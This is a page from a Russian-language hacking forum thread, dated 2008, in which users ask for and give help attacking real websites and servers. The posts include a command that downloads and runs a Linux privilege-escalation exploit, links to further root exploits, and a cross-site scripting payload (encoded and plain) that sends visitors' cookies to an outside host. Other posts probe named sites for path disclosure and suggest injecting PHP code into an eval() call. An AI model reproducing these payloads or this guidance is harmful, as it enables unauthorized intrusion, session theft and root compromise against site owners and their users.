HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1081  
Старый 28.02.2008, 00:43
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от MaSter GeN  
не впревый раз натыкаюсь на такое
http://louisianaforward.com/view-release.aspx?id=3502'
собственно подскажите что енто такое и можно ли его использовать ?
это ошибка скрипта а не БД, ипользовать можно, как раскрытие путей
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #1082  
Старый 28.02.2008, 01:01
MaSter GeN
Познающий
Регистрация: 26.01.2008
Сообщений: 71
Провел на форуме:
280720

Репутация: 141
Отправить сообщение для MaSter GeN с помощью ICQ
По умолчанию

2Scipio спасиб
 
Ответить с цитированием

  #1083  
Старый 28.02.2008, 03:45
~Taxa~
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме:
39650

Репутация: 15
По умолчанию

Добрый ночи хотел узнать у спецов в области Unix-Like можно ли в данной ОС
Linux 2.6.9-1.667 поднять права? Реально ли вообще?
 
Ответить с цитированием

  #1084  
Старый 28.02.2008, 03:58
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

~Taxa~

Цитата:
wget http://packetstormsecurity.org/0607-exploits/prctl.sh.txt

mv prctl.sh.txt prctl.sh

bash prctl.sh

Последний раз редактировалось KPOT_f!nd; 28.02.2008 в 04:01..
 
Ответить с цитированием

  #1085  
Старый 28.02.2008, 04:51
~Taxa~
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме:
39650

Репутация: 15
По умолчанию

KPOT_f!nd не помогает если ли еще способы???
 
Ответить с цитированием

  #1086  
Старый 28.02.2008, 12:54
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://milw0rm.com/exploits/2013
http://milw0rm.com/exploits/4756
если не сработает, тогда только искать тебе пассы и тыкатся на рута.
 
Ответить с цитированием

  #1087  
Старый 28.02.2008, 17:57
SIdoy
Новичок
Регистрация: 19.09.2007
Сообщений: 12
Провел на форуме:
324160

Репутация: 19
По умолчанию

Нашел пассивную xss, запрос такого вида:
http://site.ru/index.php?s=w&name=&level_min=%3C%73%63%72%69%70%7 4%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65% 28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74 %74%70%3A%2F%2F%73%2E%6E%65%74%73%65%63%2E%72%75%2 F%64%6F%6F%6D%35%35%2E%67%69%66%3F%22%2B%64%6F%63% 75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%20%64%6F%63 %75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%2E%72%6 5%70%6C%61%63%65%28%27%68%74%74%70%3A%2F%2F%64%6F% 6F%6D%35%35%2E%66%72%65%65%68%6F%73%74%69%61%2E%63 %6F%6D%2F%27%29%3C%2F%73%63%72%69%70%74%3E&level_m ax=&subclass2=any&dmg_max=

или тоже самое, что и:

http://site.ru/index.php?s=w&name=&level_min=<script>img = new Image(); img.src = "http://s.netsec.ru/123.gif?"+document.cookie; document.location.replace('http://site2.ru/')</script>&level_max=&subclass2=any&dmg_max=

Почему куки не приходят через Opera? Через IE все отлично! На других не тэстил.

Последний раз редактировалось SIdoy; 28.02.2008 в 18:04..
 
Ответить с цитированием

  #1088  
Старый 28.02.2008, 19:51
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Захожу на сайт скачать одну из нескольких лекций, а там ошибка.
т.е. ссылки я вижу, а в описании файла вот такая фигня.
--------------------------------------------------------
Warning: filesize() [function.filesize]: stat failed for /home/www/lyric/pathology.dn.ua/html/lecturies/anomalii.immunnogo.otveta.ukr.doc in /home/www/pathology.dn.ua/html/viewpage.php(26) : eval()'d code on line 56
--------------------------------------------------------
насколько я понимаю файл на сервере превышает максимально допустимый размер
или неправильно написанный скрипт по подсчету размера файла
--------------------------------------------------------
если просто пытаюсь найти уязвимый скрипт выбрасывает на главную сраницу.

можно ли это как-то использовать кроме выяснения полных путей?

Последний раз редактировалось samarin; 28.02.2008 в 20:04..
 
Ответить с цитированием

  #1089  
Старый 29.02.2008, 00:46
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

просто он файла не нашел такого и все, недумаю, что ты сможешь использовать отсутствие файла
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #1090  
Старый 29.02.2008, 08:40
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

samarin, eval()'d code on line 56 - тоесть там используется eval() попробуй в разные переменные по подставлять PHP код а вдруг чёнить получится...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ